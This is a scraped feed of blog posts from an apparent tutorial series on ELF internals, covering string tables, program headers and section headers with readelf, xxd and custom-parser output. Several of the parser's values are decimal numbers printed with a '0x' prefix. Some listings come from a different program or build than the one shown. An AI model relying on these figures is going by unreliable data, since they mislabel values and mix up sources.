Feel free to use readelf, hexdump, xxd, or any tool you prefer; the output should be the same regardless of your choice.\nUsing my pretty parser, I found three entries.\n[ 07 ] Section Name: .dynstr Type: 0x3 Flags: 0x2 Addr: 0x4a0 Offset: 0x4a0 Size: 170 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 28 ] Section Name: .strtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x3318 Size: 371 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 29 ] Section Name: .shstrtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x348b Size: 278 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 Let\u0026rsquo;s examine them closely, one by one.\nNOTE: String tables consist exclusively of strings. This data doesn\u0026rsquo;t serve much purpose unless those strings are needed by other sections.\n1. .shstrtab This is the string table (the one which stores the names of all of the sections) - well, we already talked about it, so there is no point in repeating it, right?\nSo, why are the section names stored in a separate dedicated section, rather than directly within each section\u0026rsquo;s sh_name member??\nAnswer: While I can\u0026rsquo;t say for certain, it\u0026rsquo;s possible that this design choice was made to accommodate variable-length section names. 
Storing the names in a separate section allows flexibility in the length of section names and avoids any size constraints related to the sh_name member.\nWhen I parse this with my parser, the data of this section appears like this \u0026ndash; an offset in the section and the string stored at that offset.\n[ 29 ] Section Name: .shstrtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x348b Size: 278 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 0 ] [ 1 ] .symtab [ 9 ] .strtab [ 17 ] .shstrtab [ 27 ] .interp [ 35 ] .note.gnu.property [ 54 ] .note.gnu.build-id [ 73 ] .note.ABI-tag [ 87 ] .gnu.hash [ 97 ] .dynsym [ 105 ] .dynstr [ 113 ] .gnu.version [ 126 ] .gnu.version_r [ 141 ] .rela.dyn [ 151 ] .rela.plt [ 161 ] .init [ 167 ] .text [ 173 ] .fini [ 179 ] .rodata [ 187 ] .eh_frame_hdr [ 201 ] .eh_frame [ 211 ] .init_array [ 223 ] .fini_array [ 235 ] .dynamic [ 244 ] .got [ 249 ] .got.plt [ 258 ] .data [ 264 ] .bss [ 269 ] .comment 2. .strtab This section contains strings (:P), mostly the ones representing names linked to symbol table entries (we\u0026rsquo;ll talk about symbol tables later). 
But at a quick glance, you can spot some of the names for variables and functions we used in our C program, such as global3, print_globals, main and so on.\nKeep in mind that this section does not hold strings which are used by programs like the ones used with printf function.\n[ 28 ] Section Name: .strtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x3318 Size: 371 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 0 ] [ 1 ] hello.c [ 9 ] global3 [ 17 ] print_globals [ 31 ] local3.0 [ 40 ] _DYNAMIC [ 49 ] __GNU_EH_FRAME_HDR [ 68 ] _GLOBAL_OFFSET_TABLE_ [ 90 ] __libc_start_main@GLIBC_2.34 [ 119 ] _ITM_deregisterTMCloneTable [ 147 ] _edata [ 154 ] _fini [ 160 ] __stack_chk_fail@GLIBC_2.4 [ 187 ] printf@GLIBC_2.2.5 [ 206 ] global1 [ 214 ] __data_start [ 227 ] __gmon_start__ [ 242 ] __dso_handle [ 255 ] _IO_stdin_used [ 270 ] _end [ 275 ] __bss_start [ 287 ] main [ 292 ] __TMC_END__ [ 304 ] _ITM_registerTMCloneTable [ 330 ] __cxa_finalize@GLIBC_2.2.5 [ 357 ] _init [ 363 ] global2 3. .dynstr Similar to strtab, this section contains strings for symbol table entries, but these symbols come into play during runtime, often as part of dynamic linking. Because this section is used for dynamic linking, this needs to be loaded into memory for runtime use. 
You can confirm that with the sh_flags value for this section, which should be 0x2 (or, to be fancy, SHF_ALLOC).\nFor your satisfaction, here is the output of readelf --segments hello, which indicates that this section is a part of the first LOAD segment.\n❯ readelf --segments --wide hello Elf file type is DYN (Position-Independent Executable file) Entry point 0x1050 There are 13 program headers, starting at offset 64 Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align 0 PHDR 0x000040 0x0000000000000040 0x0000000000000040 0x0002d8 0x0002d8 R 0x8 1 INTERP 0x000318 0x0000000000000318 0x0000000000000318 0x00001c 0x00001c R 0x1 [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2] 2 LOAD 0x000000 0x0000000000000000 0x0000000000000000 0x000690 0x000690 R 0x1000 3 LOAD 0x001000 0x0000000000001000 0x0000000000001000 0x00024d 0x00024d R E 0x1000 4 LOAD 0x002000 0x0000000000002000 0x0000000000002000 0x000154 0x000154 R 0x1000 5 LOAD 0x002dd0 0x0000000000003dd0 0x0000000000003dd0 0x00025c 0x000268 RW 0x1000 6 DYNAMIC 0x002de0 0x0000000000003de0 0x0000000000003de0 0x0001e0 0x0001e0 RW 0x8 7 NOTE 0x000338 0x0000000000000338 0x0000000000000338 0x000040 0x000040 R 0x8 8 NOTE 0x000378 0x0000000000000378 0x0000000000000378 0x000044 0x000044 R 0x4 9 GNU_PROPERTY 0x000338 0x0000000000000338 0x0000000000000338 0x000040 0x000040 R 0x8 10 GNU_EH_FRAME 0x002088 0x0000000000002088 0x0000000000002088 0x00002c 0x00002c R 0x4 11 GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10 12 GNU_RELRO 0x002dd0 0x0000000000003dd0 0x0000000000003dd0 0x000230 0x000230 R 0x1 Section to Segment mapping: Segment Sections... 
00 01 .interp 02 .interp .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt 03 .init .plt .text .fini 04 .rodata .eh_frame_hdr .eh_frame 05 .init_array .fini_array .dynamic .got .got.plt .data .bss 06 .dynamic 07 .note.gnu.property 08 .note.gnu.build-id .note.ABI-tag 09 .note.gnu.property 10 .eh_frame_hdr 11 12 .init_array .fini_array .dynamic .got But the section structure is still the same as any other string table, so my cool parser parsed it.\n[ 07 ] Section Name: .dynstr Type: 0x3 Flags: 0x2 Addr: 0x4a0 Offset: 0x4a0 Size: 170 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 0 ] [ 1 ] __cxa_finalize [ 16 ] __libc_start_main [ 34 ] __stack_chk_fail [ 51 ] printf [ 58 ] libc.so.6 [ 68 ] GLIBC_2.2.5 [ 80 ] GLIBC_2.4 [ 90 ] GLIBC_2.34 [ 101 ] _ITM_deregisterTMCloneTable [ 129 ] __gmon_start__ [ 144 ] _ITM_registerTMCloneTable Conclusion String tables in ELF files serve as repositories for section names, symbol names, and the names needed for dynamic linking. Keeping string data in dedicated sections like .strtab and .dynstr allows names of any length, and it means only the table that is needed at runtime (.dynstr, the one flagged SHF_ALLOC) has to be loaded into memory.\nBefore closing this, I want you to run the strip command against the ELF binary used in this article\u0026hellip; Whatever happens will raise some good new questions for you to dig deeper (some of those questions will be answered as we go forward with this series).\n","permalink":"https://ayedaemon.github.io/post/2023/10/elf-chronicles-string-tables/","summary":"In the article about section headers, you got an introduction to string tables. 
In this article, we will delve deeper into the topic.\n\u0026hellip;prologue We\u0026rsquo;ll start with the same program we used in the previous article about section headers.\n/* file: hello_world.c */ #include \u0026lt;stdio.h\u0026gt; // A macro #define HELLO_MSG1 \u0026#34;Hello World1\u0026#34; // A global variable char HELLO_MSG2[] = \u0026#34;Hello World2\u0026#34;; // main function int main() { // local variable for main char HELLO_MSG3[] = \u0026#34;Hello World3\u0026#34;; // Print messages printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG1); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG2); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG3); return 0; } Compile this and then analyze the ELF executable file using readelf (Not everytime we\u0026rsquo;ll go with xxd).","title":"Elf Chronicles: String Tables (4/?)"},{"content":"In preceding articles, we\u0026rsquo;ve delved into the details of ELF file headers and section headers. Section headers provide insight into how data and instructions are organized based on their characteristics and grouped into distinct sections. These sections remain distinct due to variations in their types and permissions (\u0026hellip; and few other things).\nUp to this point, our focus has been on the aspects of the ELF file as it resides on-disk. However, we now turn our attention to what occurs when the file is loaded into memory. How is its arrangement handled? Are all the sections loaded into memory?\nThis is where the concept of program headers comes into play. Program headers are similar to section headers, but instead of section information, they store segment information. A segment encompasses one or more sections from the ELF file. 
While program headers hold little significance while the file is on disk, they become imperative when the file needs to be loaded and executed in memory, specifically in the case of executables and shared objects.\nSome criteria for grouping sections to form segments can be:\nType and purpose of the sections (like .data and .bss), Memory Access Permissions and mapping, Alignment and Layout, Segment size constraints, OS and platform requirements, etc For this article, I\u0026rsquo;ll be using the same C code to generate an ELF file\n/* File: hello_world.c Compile: gcc hello_world.c -o hello_world */ #include \u0026lt;stdio.h\u0026gt; // A macro #define HELLO_MSG1 \u0026#34;Hello World1\u0026#34; // A global variable char HELLO_MSG2[] = \u0026#34;Hello World2\u0026#34;; // main function int main() { // local variable for main char HELLO_MSG3[] = \u0026#34;Hello World3\u0026#34;; // Print messages printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG1); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG2); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG3); return 0; } Once you have the ELF file, you can get the program header related information from ELF file headers - e_phoff, e_phentsize and e_phnum\nI\u0026rsquo;ll use readelf to get this information from the ELF headers. 
Feel free to use any method of your choice.\nELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2\u0026#39;s complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: DYN (Position-Independent Executable file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0x1040 Start of program headers: 64 (bytes into file) Start of section headers: 13496 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 13 Size of section headers: 64 (bytes) Number of section headers: 30 Section header string table index: 29 From the output above, we can deduce that\nthe program headers are located at an offset of 64 bytes, each of these header entries is 56 bytes in size, and in total, we\u0026rsquo;ve got 13 entries Now we can use xxd to get the data out, one 56-byte entry per line\n❯ xxd -s 64 -l $(( 56*13 )) -c 56 build/hello 00000040: 0600 0000 0400 0000 4000 0000 0000 0000 4000 0000 0000 0000 4000 0000 0000 0000 d802 0000 0000 0000 d802 0000 0000 0000 0800 0000 0000 0000 ........@.......@.......@............................... 00000078: 0300 0000 0400 0000 1803 0000 0000 0000 1803 0000 0000 0000 1803 0000 0000 0000 1c00 0000 0000 0000 1c00 0000 0000 0000 0100 0000 0000 0000 ........................................................ 000000b0: 0100 0000 0400 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 3006 0000 0000 0000 3006 0000 0000 0000 0010 0000 0000 0000 ................................0.......0............... 000000e8: 0100 0000 0500 0000 0010 0000 0000 0000 0010 0000 0000 0000 0010 0000 0000 0000 8901 0000 0000 0000 8901 0000 0000 0000 0010 0000 0000 0000 ........................................................ 00000120: 0100 0000 0400 0000 0020 0000 0000 0000 0020 0000 0000 0000 0020 0000 0000 0000 b400 0000 0000 0000 b400 0000 0000 0000 0010 0000 0000 0000 ......... ....... ....... .............................. 00000158: 0100 0000 0600 0000 d02d 0000 0000 0000 d03d 0000 0000 0000 d03d 0000 0000 0000 4802 0000 0000 0000 5002 0000 0000 0000 0010 0000 0000 0000 .........-.......=.......=......H.......P............... 00000190: 0200 0000 0600 0000 e02d 0000 0000 0000 e03d 0000 0000 0000 e03d 0000 0000 0000 e001 0000 0000 0000 e001 0000 0000 0000 0800 0000 0000 0000 .........-.......=.......=.............................. 000001c8: 0400 0000 0400 0000 3803 0000 0000 0000 3803 0000 0000 0000 3803 0000 0000 0000 4000 0000 0000 0000 4000 0000 0000 0000 0800 0000 0000 0000 ........8.......8.......8.......@.......@............... 00000200: 0400 0000 0400 0000 7803 0000 0000 0000 7803 0000 0000 0000 7803 0000 0000 0000 4400 0000 0000 0000 4400 0000 0000 0000 0400 0000 0000 0000 ........x.......x.......x.......D.......D............... 00000238: 53e5 7464 0400 0000 3803 0000 0000 0000 3803 0000 0000 0000 3803 0000 0000 0000 4000 0000 0000 0000 4000 0000 0000 0000 0800 0000 0000 0000 S.td....8.......8.......8.......@.......@............... 00000270: 50e5 7464 0400 0000 1420 0000 0000 0000 1420 0000 0000 0000 1420 0000 0000 0000 2400 0000 0000 0000 2400 0000 0000 0000 0400 0000 0000 0000 P.td..... ....... ....... ......$.......$............... 000002a8: 51e5 7464 0600 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 1000 0000 0000 0000 Q.td.................................................... 000002e0: 52e5 7464 0400 0000 d02d 0000 0000 0000 d03d 0000 0000 0000 d03d 0000 0000 0000 3002 0000 0000 0000 3002 0000 0000 0000 0100 0000 0000 0000 R.td.....-.......=.......=......0.......0............... 
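The arithmetic behind that dump, and the decoding of a single entry, can be sketched in Python. Treat this as an illustration under stated assumptions rather than the parser used in this article: the three header values come from the readelf output, FIRST_ENTRY is the first 56 bytes of the dump, and the names PHDR_FORMAT, PHDR_FIELDS and FIRST_ENTRY are invented here. The layout assumed is the 64-bit program header: two 32-bit words followed by six 64-bit values.

```python
import struct

# Values taken from the ELF header: e_phoff, e_phentsize and e_phnum.
E_PHOFF, E_PHENTSIZE, E_PHNUM = 64, 56, 13

# 64-bit program header layout, little-endian.
PHDR_FORMAT = '<IIQQQQQQ'
PHDR_FIELDS = ('p_type', 'p_flags', 'p_offset', 'p_vaddr', 'p_paddr',
               'p_filesz', 'p_memsz', 'p_align')

# Size of the whole table and the file offset of every entry.
table_size = E_PHENTSIZE * E_PHNUM
entry_offsets = [E_PHOFF + i * E_PHENTSIZE for i in range(E_PHNUM)]

# The first 56 bytes of the table, one hex string per member.
FIRST_ENTRY = bytes.fromhex(
    '06000000' '04000000' '4000000000000000' '4000000000000000'
    '4000000000000000' 'd802000000000000' 'd802000000000000'
    '0800000000000000'
)

phdr = dict(zip(PHDR_FIELDS, struct.unpack(PHDR_FORMAT, FIRST_ENTRY)))

print('table size:', table_size, 'bytes')
print('entry offsets:', [hex(offset) for offset in entry_offsets])
for name in PHDR_FIELDS:
    print(name, hex(phdr[name]))
```

Note that p_filesz of this first entry (type 0x6, PT_PHDR) equals the size of the whole table, since that entry describes the program header table itself.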
Now we just have to map each of these lines to Elf64_Phdr (since we have a 64Bit file)\n/* https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/elf.h#L260 */ typedef struct elf64_phdr { Elf64_Word p_type; /* Segment type */ Elf64_Word p_flags; /* Segment flags */ Elf64_Off p_offset; /* Segment file offset */ Elf64_Addr p_vaddr; /* Segment virtual address */ Elf64_Addr p_paddr; /* Segment physical address */ Elf64_Xword p_filesz; /* Segment size in file */ Elf64_Xword p_memsz; /* Segment size in memory */ Elf64_Xword p_align; /* Segment alignment, file \u0026amp; memory */ } Elf64_Phdr; Using my nifty little parser, I got this digestible and user-friendly output for the above dump (Feel free to compare it)\n[ + ] Program headers begins at: 0x40 [ 00 ] Type: 0x6 Flags: 0x4 Offset: 0x0040 vaddr: 0x40 paddr: 0x40 filesz: 0x728 memsz: 0x728 align: 0x8 [ 01 ] Type: 0x3 Flags: 0x4 Offset: 0x0318 vaddr: 0x318 paddr: 0x318 filesz: 0x28 memsz: 0x28 align: 0x1 [ 02 ] Type: 0x1 Flags: 0x4 Offset: 0x0000 vaddr: 0x0 paddr: 0x0 filesz: 0x1584 memsz: 0x1584 align: 0x1000 [ 03 ] Type: 0x1 Flags: 0x5 Offset: 0x1000 vaddr: 0x1000 paddr: 0x1000 filesz: 0x393 memsz: 0x393 align: 0x1000 [ 04 ] Type: 0x1 Flags: 0x4 Offset: 0x2000 vaddr: 0x2000 paddr: 0x2000 filesz: 0x180 memsz: 0x180 align: 0x1000 [ 05 ] Type: 0x1 Flags: 0x6 Offset: 0x2dd0 vaddr: 0x3dd0 paddr: 0x3dd0 filesz: 0x584 memsz: 0x592 align: 0x1000 [ 06 ] Type: 0x2 Flags: 0x6 Offset: 0x2de0 vaddr: 0x3de0 paddr: 0x3de0 filesz: 0x480 memsz: 0x480 align: 0x8 [ 07 ] Type: 0x4 Flags: 0x4 Offset: 0x0338 vaddr: 0x338 paddr: 0x338 filesz: 0x64 memsz: 0x64 align: 0x8 [ 08 ] Type: 0x4 Flags: 0x4 Offset: 0x0378 vaddr: 0x378 paddr: 0x378 filesz: 0x68 memsz: 0x68 align: 0x4 [ 09 ] Type: 0xe553 Flags: 0x4 Offset: 0x0338 vaddr: 0x338 paddr: 0x338 filesz: 0x64 memsz: 0x64 align: 0x8 [ 10 ] Type: 0xe550 Flags: 0x4 Offset: 0x2014 vaddr: 0x2014 paddr: 0x2014 filesz: 0x36 memsz: 0x36 align: 0x4 [ 11 ] Type: 0xe551 Flags: 0x6 Offset: 
0x0000 vaddr: 0x0 paddr: 0x0 filesz: 0x0 memsz: 0x0 align: 0x10 [ 12 ] Type: 0xe552 Flags: 0x4 Offset: 0x2dd0 vaddr: 0x3dd0 paddr: 0x3dd0 filesz: 0x560 memsz: 0x560 align: 0x1 Now, it\u0026rsquo;s time to take a deep dive into the inner workings of the Elf64_Phdr struct\n1. p_type Just like sh_type, this member tells the type of the segment, for example whether the segment will be loaded into memory or is just used to store notes. (Note that the parser output above prints only the low 16 bits of the GNU-specific types, so PT_GNU_PROPERTY shows up as 0xe553 rather than the full 0x6474e553 seen in the hexdump.)\n/* https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/elf.h#L25 */ /* These constants are for the segment types stored in the image headers */ #define PT_NULL 0 #define PT_LOAD 1 #define PT_DYNAMIC 2 #define PT_INTERP 3 #define PT_NOTE 4 #define PT_SHLIB 5 #define PT_PHDR 6 #define PT_TLS 7 /* Thread local storage segment */ #define PT_LOOS 0x60000000 /* OS-specific */ #define PT_HIOS 0x6fffffff /* OS-specific */ #define PT_LOPROC 0x70000000 #define PT_HIPROC 0x7fffffff #define PT_GNU_EH_FRAME\t(PT_LOOS + 0x474e550) #define PT_GNU_STACK\t(PT_LOOS + 0x474e551) #define PT_GNU_RELRO\t(PT_LOOS + 0x474e552) #define PT_GNU_PROPERTY\t(PT_LOOS + 0x474e553) 2. p_flags This is quite similar to the (r)ead, (w)rite and e(x)ecute permissions we are familiar with. This member specifies the permissions for the given segment.\nUsually the segment containing the .text section will have (r)ead and e(x)ecute permissions.\n/* https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/elf.h#L243 */ /* These constants define the permissions on sections in the program header, p_flags. */ #define PF_R 0x4 #define PF_W 0x2 #define PF_X 0x1 3. p_offset This holds the offset from the beginning of the file, where the first byte of the first section in this segment is located.\n4. p_vaddr This member holds the memory/virtual address for the segment.\n5. p_paddr This is the counterpart of p_vaddr that holds the physical address for the segment. It only matters on systems where physical addressing is relevant; for ordinary Linux executables it is ignored and, as in the output above, usually just mirrors p_vaddr.\n6. p_filesz This holds the on-disk size (in bytes) of the segment.\n7. 
p_memsz This member holds the memory/virtual size (in bytes) of the segment. It can be larger than p_filesz (for example, when the segment contains .bss); the extra bytes are zero-filled in memory.\n8. p_align This member holds the value to which the segments are aligned in memory and in the file.\nSimilar to sh_addralign, values of 0 and 1 are treated as \u0026ldquo;no alignment\u0026rdquo;, while the positive powers of 2 are taken as the actual alignment values.\nPracticals Let\u0026rsquo;s start with checking if the strip command makes any change to the program headers.\nTry to write a program to parse the program headers and display the information in a better way. Try to write a program that gives the information about what sections are grouped together in a segment. readelf gives this information in the format below Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align PHDR 0x000040 0x0000000000000040 0x0000000000000040 0x0002d8 0x0002d8 R 0x8 INTERP 0x000318 0x0000000000000318 0x0000000000000318 0x00001c 0x00001c R 0x1 [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2 ] LOAD 0x000000 0x0000000000000000 0x0000000000000000 0x000630 0x000630 R 0x1000 LOAD 0x001000 0x0000000000001000 0x0000000000001000 0x000189 0x000189 R E 0x1000 LOAD 0x002000 0x0000000000002000 0x0000000000002000 0x0000b4 0x0000b4 R 0x1000 LOAD 0x002dd0 0x0000000000003dd0 0x0000000000003dd0 0x000248 0x000250 RW 0x1000 DYNAMIC 0x002de0 0x0000000000003de0 0x0000000000003de0 0x0001e0 0x0001e0 RW 0x8 NOTE 0x000338 0x0000000000000338 0x0000000000000338 0x000040 0x000040 R 0x8 NOTE 0x000378 0x0000000000000378 0x0000000000000378 0x000044 0x000044 R 0x4 GNU_PROPERTY 0x000338 0x0000000000000338 0x0000000000000338 0x000040 0x000040 R 0x8 GNU_EH_FRAME 0x002014 0x0000000000002014 0x0000000000002014 0x000024 0x000024 R 0x4 GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10 GNU_RELRO 0x002dd0 0x0000000000003dd0 0x0000000000003dd0 0x000230 0x000230 R 0x1 Section to Segment mapping: Segment Sections... 
00 01 .interp 02 .interp .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt 03 .init .plt .text .fini 04 .rodata .eh_frame_hdr .eh_frame 05 .init_array .fini_array .dynamic .got .got.plt .data .bss 06 .dynamic 07 .note.gnu.property 08 .note.gnu.build-id .note.ABI-tag 09 .note.gnu.property 10 .eh_frame_hdr 11 12 .init_array .fini_array .dynamic .got If you want to go the extra mile and dig deep,\nTry overwriting the program interpreter with your custom loader program. Things will probably go wrong, and then you can dig into the root cause. Add a new section (.text type), create its section header entry, then create its program header entry such that it is loadable in memory. Then change the ELF entrypoint to the newly created section. Conclusion Alright, buckle up, because we have just seen what segments are, how sections are grouped into segments, and how program headers act as a table that stores the information about segments needed at runtime. 
Picture this -\n┌───────────────────────────┐ │ │ │ File Header │ │ │ │ │ ├───────────────────────────┤ │ │ │ Program Header │ │ │ │ │ ├───────────────────────────┤ ◄───┐ │ │ │ │ │ │ │ Section 1 │ │ │ │ │ ├───────────────────────────┤ │ Segment 1 │ Section 2 │ │ ├───────────────────────────┤ │ │ │ │ │ Section 3 │ │ ├───────────────────────────┤ ◄───┤ │ │ │ │ │ │ │ │ │ │ │ │ Segment 2 │ │ │ │ Section 4 │ │ │ │ │ │ │ ◄───┤ │ │ │ Segment 3 │ │ │ ├───────────────────────────┤ ◄───┤ │ │ │ │ │ │ │ Section 5 │ │ │ │ │ Segment 4 │ │ │ │ │ │ ├───────────────────────────┤ ◄───┤ │ │ │ │ │ │ │ Section 6 │ │ Segment 5 │ │ │ │ │ │ ├───────────────────────────┤ ◄───┘ │ │ │ │ │ Section Header │ │ │ │ │ └───────────────────────────┘ ","permalink":"https://ayedaemon.github.io/post/2023/10/elf-chronicles-program-headers/","summary":"In preceding articles, we\u0026rsquo;ve delved into the details of ELF file headers and section headers. Section headers provide insight into how data and instructions are organized based on their characteristics and grouped into distinct sections. 
These sections remain distinct due to variations in their types and permissions (\u0026hellip; and few other things).\nUp to this point, our focus has been on the aspects of the ELF file as it resides on-disk.","title":"ELF Chronicles: Program Headers (3/?)"},{"content":"Intro Assuming you\u0026rsquo;ve got ELF headers like Elf64_Ehdr or Elf32_Ehdr at your fingertips, and you\u0026rsquo;re armed with the know-how and tools to decipher their contents effortlessly.\nFor this article I\u0026rsquo;ll be using the below C code to generate the ELF file.\n/* file: hello_world.c */ #include \u0026lt;stdio.h\u0026gt; // A macro #define HELLO_MSG1 \u0026#34;Hello World1\u0026#34; // A global variable char HELLO_MSG2[] = \u0026#34;Hello World2\u0026#34;; // main function int main() { // local variable for main char HELLO_MSG3[] = \u0026#34;Hello World3\u0026#34;; // Print messages printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG1); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG2); printf(\u0026#34;%s\\n\u0026#34;, HELLO_MSG3); return 0; } You can get the ELF binary by compiling this code.\ngcc hello_world.c -o hello_world Now, the challenge on our hands is to crack open the file and unearth some juicy details about the sections. You know, things like e_shoff, e_shentsize, e_shnum, and e_shstrndx. I confess, like any other mere human, I often lean on a trusty \u0026ldquo;industry-grade\u0026rdquo; tool called readelf to do the heavy lifting when it comes to ELF file forensics. 
(But it\u0026rsquo;s always good to know the manual methods for those 1% kind of situations)\n❯ readelf --file-header --wide hello_world ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2\u0026#39;s complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: DYN (Position-Independent Executable file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0x1050 Start of program headers: 64 (bytes into file) Start of section headers: 13608 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 13 Size of section headers: 64 (bytes) Number of section headers: 30 Section header string table index: 29 Examining the output above, we can deduce a few key details.\nFirstly, the section headers take their grand entrance at a distance of 13608 bytes (0x3528 in the mystical language of hex). Each of these header entries is precisely 64 bytes in size (0x40 in hex), and in total, we\u0026rsquo;ve got a flourishing population of 30 sections (1e in hex). So, it\u0026rsquo;s like having a treasure map telling us exactly where to dig in the ELF file and how big the treasure chests are!\n❯ xxd -s 13608 -l $(( 64*30 )) -c 64 hello_world 00003528: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ................................................................ 00003568: 1b00 0000 0100 0000 0200 0000 0000 0000 1803 0000 0000 0000 1803 0000 0000 0000 1c00 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 ................................................................ 000035a8: 2300 0000 0700 0000 0200 0000 0000 0000 3803 0000 0000 0000 3803 0000 0000 0000 4000 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 #...............8.......8.......@............................... 
000035e8: 3600 0000 0700 0000 0200 0000 0000 0000 7803 0000 0000 0000 7803 0000 0000 0000 2400 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 6...............x.......x.......$............................... 00003628: 4900 0000 0700 0000 0200 0000 0000 0000 9c03 0000 0000 0000 9c03 0000 0000 0000 2000 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 I............................... ............................... 00003668: 5700 0000 f6ff ff6f 0200 0000 0000 0000 c003 0000 0000 0000 c003 0000 0000 0000 1c00 0000 0000 0000 0600 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 W......o........................................................ 000036a8: 6100 0000 0b00 0000 0200 0000 0000 0000 e003 0000 0000 0000 e003 0000 0000 0000 c000 0000 0000 0000 0700 0000 0100 0000 0800 0000 0000 0000 1800 0000 0000 0000 a............................................................... 000036e8: 6900 0000 0300 0000 0200 0000 0000 0000 a004 0000 0000 0000 a004 0000 0000 0000 a800 0000 0000 0000 0000 0000 0000 0000 0100 0000 0000 0000 0000 0000 0000 0000 i............................................................... 00003728: 7100 0000 ffff ff6f 0200 0000 0000 0000 4805 0000 0000 0000 4805 0000 0000 0000 1000 0000 0000 0000 0600 0000 0000 0000 0200 0000 0000 0000 0200 0000 0000 0000 q......o........H.......H....................................... 00003768: 7e00 0000 feff ff6f 0200 0000 0000 0000 5805 0000 0000 0000 5805 0000 0000 0000 4000 0000 0000 0000 0700 0000 0100 0000 0800 0000 0000 0000 0000 0000 0000 0000 ~......o........X.......X.......@............................... 000037a8: 8d00 0000 0400 0000 0200 0000 0000 0000 9805 0000 0000 0000 9805 0000 0000 0000 c000 0000 0000 0000 0600 0000 0000 0000 0800 0000 0000 0000 1800 0000 0000 0000 ................................................................ 
000037e8: 9700 0000 0400 0000 4200 0000 0000 0000 5806 0000 0000 0000 5806 0000 0000 0000 3000 0000 0000 0000 0600 0000 1700 0000 0800 0000 0000 0000 1800 0000 0000 0000 ........B.......X.......X.......0............................... 00003828: a100 0000 0100 0000 0600 0000 0000 0000 0010 0000 0000 0000 0010 0000 0000 0000 1b00 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................................................................ 00003868: 9c00 0000 0100 0000 0600 0000 0000 0000 2010 0000 0000 0000 2010 0000 0000 0000 3000 0000 0000 0000 0000 0000 0000 0000 1000 0000 0000 0000 1000 0000 0000 0000 ................ ....... .......0............................... 000038a8: a700 0000 0100 0000 0600 0000 0000 0000 5010 0000 0000 0000 5010 0000 0000 0000 7101 0000 0000 0000 0000 0000 0000 0000 1000 0000 0000 0000 0000 0000 0000 0000 ................P.......P.......q............................... 000038e8: ad00 0000 0100 0000 0600 0000 0000 0000 c411 0000 0000 0000 c411 0000 0000 0000 0d00 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................................................................ 00003928: b300 0000 0100 0000 0200 0000 0000 0000 0020 0000 0000 0000 0020 0000 0000 0000 1100 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................. ....... ...................................... 00003968: bb00 0000 0100 0000 0200 0000 0000 0000 1420 0000 0000 0000 1420 0000 0000 0000 2400 0000 0000 0000 0000 0000 0000 0000 0400 0000 0000 0000 0000 0000 0000 0000 ................. ....... ......$............................... 000039a8: c900 0000 0100 0000 0200 0000 0000 0000 3820 0000 0000 0000 3820 0000 0000 0000 7c00 0000 0000 0000 0000 0000 0000 0000 0800 0000 0000 0000 0000 0000 0000 0000 ................8 ......8 ......|............................... 
